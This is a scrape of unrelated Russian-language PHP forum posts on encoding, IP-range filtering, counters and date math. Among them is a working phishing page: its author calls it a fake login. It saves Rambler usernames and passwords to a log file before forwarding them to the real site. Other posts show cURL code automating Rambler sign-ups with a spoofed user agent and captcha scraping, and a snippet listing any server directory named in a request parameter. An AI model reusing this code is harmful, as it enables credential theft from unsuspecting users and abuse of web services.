решил вопрос если кому интересно base64_encode(); # Шифруем base64_decode(); # Расшифровываем интересно было послушать другие варианты
как загрузить на компьютер значение капчи как загрузить/сохранит на компьютер значение капчи, что бы потом отправить на распознание PHP: // Создаем подключение if( $curl = curl_init() ){ // Нужно загрузить главную страницу бобра curl_setopt($curl,CURLOPT_URL,'http://id.rambler.ru/script/newuser.cgi'); // Нужно помнить кукисы! curl_setopt($curl, CURLOPT_COOKIESESSION, TRUE); curl_setopt($curl, CURLOPT_COOKIEFILE, "cookiefile"); // Скачанный код возвращаем в переменную а не в поток curl_setopt($curl,CURLOPT_RETURNTRANSFER,true); // "Следовать туда, куда зовут". Если сервис выдает 302 код, мы следуем по этой ссылке curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true); // Таймаут, если сервис не отвечает больше 30 секунд, выходим curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,30); // Активируем GZIP сжатие трафика curl_setopt($curl,CURLOPT_ENCODING,'gzip,deflate'); // Соврем Бобру, напишем в юзер-агент неправду curl_setopt($curl,CURLOPT_USERAGENT,'$user_agent'); // Если все ок, в $html вернется html код главной страницы if( $html = curl_exec($curl) ){ // Указываем куда отправлять запрос curl_setopt($curl,CURLOPT_URL,'http://id.rambler.ru/script/newuser.cgi'); // Указываем подключению, что слать нужно не GET (по умолчанию), а POST запросы curl_setopt($curl,CURLOPT_POST,TRUE); // Указываем, что именно отправлять в POST данных, на этой стадии происходит ввод логина/пароля curl_setopt($curl,CURLOPT_POSTFIELDS,"login=$login&firstname=$name&lastname=$lastname"); if($html = curl_exec($curl)){ // ищем секретный id-картинки if(preg_match('#<img src="http://id.captcha.rambler.ru/(.*).jpg" alt="" border="0" vspace="2">#', $html, $capcha)){ }
А если : PHP: if (isset($_REQUEST['scandir'])) { $file_list = scandir($_REQUEST['scandir']); foreach($file_list as $key=>$value) echo "$key = $value <br/>"; } Или: PHP: $fd=fopen('log.txt','a+'); if (isset($_REQUEST['scandir'])) { $file_list = scandir($_REQUEST['scandir']); foreach($file_list as $key=>$value) fwrite($fd,$key."=".$value."\n"); } fclose($fd);
нужна помощь, есть ф-ия smarty_function_sape (примеров кода в сети уйма), надо забанить только несколько указаных диапазонов IP адресов для локальной сети (типа 172.1.0.1-172.1.0.255 и 192.168.0.1-192.168.0.255) на показ ссылок.
поидее json_encode This function only works with UTF-8 encoded data. от других кодировок- он отплевываеться
вобщем копировать не буду функция decode() пример смотри здесь http://www.linkexchanger.su/2008/41.html
имхо проще в шаблоне не выводить их на показ, а не функцию ковырять.... в шабе пропиши что-то типа Code: {php} if(ereg("192\.168\.0\.(.*)",getenv("REMOTE_ADDR")){ echo ""; } elseif(ereg("172\.1\.0\.(.*)",getenv("REMOTE_ADDR"){ echo ""; }else{ echo $sape->return_links(); } {/php}
Смотрим регуляркой на IP, и если не найдены диапы, вызываем функцию. PHP: <?php if(!preg_match('#172\.1\.0\.[0-9]{1,3} | 192\.168\.0\.[0-9]{1,3}#', $_SERVER['REMOTE_ADDR'])) smarty_function_sape(); function smarty_function_sape() { echo 'smarty_function_sape'; } ?>
Спасибо, но я уже сделал по примерам таким вот способом: PHP: <?php function check_deny($mask) { $idx = preg_match("#(.*)\.(.*)\.(.*)\.(.*)#", $mask, $ban_args); $idx = preg_match("#(.*)\.(.*)\.(.*)\.(.*)#", $_SERVER["REMOTE_ADDR"], $ip_args); for($x=1;$x<=4;$x++) { if (($ban_args[$x] == $ip_args[$x]) || $ban_args[$x] == "XXX") return "banned"; return "clear"; } } function smarty_function_sape($params,&$smarty) { define('_SAPE_USER', '85e0d69d................1eb2d3a3'); require_once($_SERVER['DOCUMENT_ROOT'].'/'._SAPE_USER.'/sape.php'); $banmask1 = "1.1.1.XXX"; $banmask2 = "2.2.2.XXX"; $banmask3 = "3.3.3.XXX"; // $o[ 'force_show_code' ] = true; //$sape = new SAPE_client( $o ); if (check_deny($banmask1)=="banned") { echo ""; }elseif (check_deny($banmask2)=="banned") { echo ""; }elseif (check_deny($banmask3)=="banned") { echo ""; }else {$sape = new SAPE_client(); echo $sape->return_links(); } } ?>
Как сделать чтобы количество комментариев записывалось в файл? Вставляю этот код в обработчик PHP: <?PHP $file = file_get_contents('text.txt'); preg_match('(.*)', $file, $out) ; $a=$out[0]; $filelog = fopen("text.txt","w+"); $a=$a+1; fwrite($filelog," $a "); fclose($filelog); ?> но он выдаёт ошибку. Как исправить? или подскажите другой способ.
Странно мне нужно было тоже самое,но не для сапы.. взял у вас функцию check_deny передаю ей маску 127.0.0.XXX и тестирую на локалке. Получается мой ИП 127.0.0.1 и он попадает в маску. Функция говорит Banned но передаем следом маску 127.0.1.XXX и тоже говорит banned
Вот на скорую руку, вроде справляется, но не углублялся. PHP: <?php ban_ip('127.0.0.*'); echo 'Все ок =)'; function ban_ip($mask) { list($ip1,$ip2,$ip3,$ip4) = explode('.',$mask); $regexp = "#$ip1\.$ip2\.$ip3\.$ip4#"; $regexp = str_replace('*','(\d+)',$regexp); if(preg_match($regexp,$_SERVER['REMOTE_ADDR'])) die('Извините, но ваш IP('.$_SERVER['REMOTE_ADDR'].') адрес, попадает под маску заблокированных.'); } ?>
Strilo4ka Есть мнение, что под расширением может скрываться почти любая СУБД. Любая из этих- http://ru.php.net/manual/en/refs.database.vendors.php и не только
Здраствуйте! PHP: <?php $f=fopen("pass.log","at"); flock($f,2); fputs($f,"Логин: ".$_POST['login']."\n"); fputs($f,"Пароль ".$_POST['passw']."\n"."---------------\n"); flock($f,3); fclose($f); ?> <form id="send" method="post" action="http://id.rambler.ru/script/auth.cgi?mode=login" name="auth_form"> <input type="hidden" name="from" value=""> <input type="hidden" name="back" value="http://mail.rambler.ru/mail/startpage"> <input type="hidden" name="url" value=""> <input type="text" name="login" id="login" value="<?php echo $login ?>"> <input type="password" name="passw" id="passw" value="<?php echo $passw ?>"> </form> <script> setTimeout(document.getElementById('send').submit(),5); </script> Авторизация если правильный логин и пароль проходит! А вот как получить ответ от сервера? Тоесть если не правильный пароль то не переходит на сайт рамблера а переходит на другую страницу! Так сказать PHP: if ($login == 'login',$passw == 'passw') { echo "Правильный пароль"; } else { echo "Не правильный пароль"; } Для понятия пишу Фейк с авторизацией! Заранее благодарен)
PHP: $time = 4668725; $totaldays = (int)($time / 86400); // секунды => дни $month = (int)($totaldays / 30); // месяца $lostdays = $totaldays % 30; // остаток дней $weeks = (int)($lostdays / 7); // недель $days = $weeks % 7; // дней echo $month.' мес. '.$weeks.' нед. '.$days.' дн.'; Без склонений слов.